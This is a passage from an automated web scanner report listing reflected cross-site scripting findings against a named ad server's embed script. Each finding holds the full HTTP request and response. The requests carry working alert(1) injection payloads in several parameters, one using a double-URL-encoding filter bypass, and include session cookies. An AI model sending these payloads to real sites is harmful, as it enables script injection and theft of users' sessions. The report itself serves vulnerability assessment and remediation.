   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQec678'-alert(1)-'8c695f1ae57&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href
...[SNIP]...

1.43. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9848'-alert(1)-'5b0c6c829a2 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488f9848'-alert(1)-'5b0c6c829a2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:53:08 GMT; path=/
Set-Cookie: i_1=33:353:516:3:0:34426:1296683588:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:53:08 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 846

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488f9848'-alert(1)-'5b0c6c829a2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       
...[SNIP]...

1.44. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 304f9'-alert(1)-'df9bcca7015 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G304f9'-alert(1)-'df9bcca7015&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:52:59 GMT; path=/
Set-Cookie: i_1=33:353:22:3:0:34426:1296683579:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:52:59 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 857

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G304f9'-alert(1)-'df9bcca7015&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad';
       var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
       return true;
   }
       function
...[SNIP]...

1.45. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335** [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f68cc'-alert(1)-'ca9f21a572f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683335**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&f68cc'-alert(1)-'ca9f21a572f=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:54:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:54:20 GMT; path=/
Set-Cookie: i_1=33:353:23:3:0:34426:1296683660:B2|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:54:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 851

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad&f68cc'-alert(1)-'ca9f21a572f=1';
       var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
       return true;
   }
       function wsod_image() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10877d5d
...[SNIP]...

1.46. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12676"-alert(1)-"e19a228f6fc was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=801064012676"-alert(1)-"e19a228f6fc&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:52:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
oto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683569**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=801064012676"-alert(1)-"e19a228f6fc&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

1.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dacb0"-alert(1)-"739720fb74 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155dacb0"-alert(1)-"739720fb74&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1679

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683597**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155dacb0"-alert(1)-"739720fb74&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

1.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20962"-alert(1)-"2a1d1d242bf was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad20962"-alert(1)-"2a1d1d242bf HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
*;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad20962"-alert(1)-"2a1d1d242bf">
...[SNIP]...

1.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96c1d"-alert(1)-"ac8d47e6ca4 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ96c1d"-alert(1)-"ac8d47e6ca4&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
6e6a631357/353.0.js.120x30/1296683606**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ96c1d"-alert(1)-"ac8d47e6ca4&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

1.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81851%2522%253balert%25281%2529%252f%252faa8ae4a84fa was submitted in the REST URL parameter 2. This input was echoed as 81851";alert(1)//aa8ae4a84fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135781851%2522%253balert%25281%2529%252f%252faa8ae4a84fa/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:54:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a63135781851";alert(1)//aa8ae4a84fa/353.0.js.120x30/1296683666**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f
...[SNIP]...

1.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e6b8%2522%253balert%25281%2529%252f%252f7ebd7131956 was submitted in the REST URL parameter 3. This input was echoed as 3e6b8";alert(1)//7ebd7131956 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x303e6b8%2522%253balert%25281%2529%252f%252f7ebd7131956/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:54:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x303e6b8";alert(1)//7ebd7131956/1296683672**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9
...[SNIP]...

1.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c105a"-alert(1)-"fb1bd8b3ce2 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/671239155?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488c105a"-alert(1)-"fb1bd8b3ce2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:53:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683587**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488c105a"-alert(1)-"fb1bd8b3ce2&AN=671239155&PG=INVSRQ&ASID=644f272384fc4ea392c9e50a46bc0aad">
...[SNIP]...

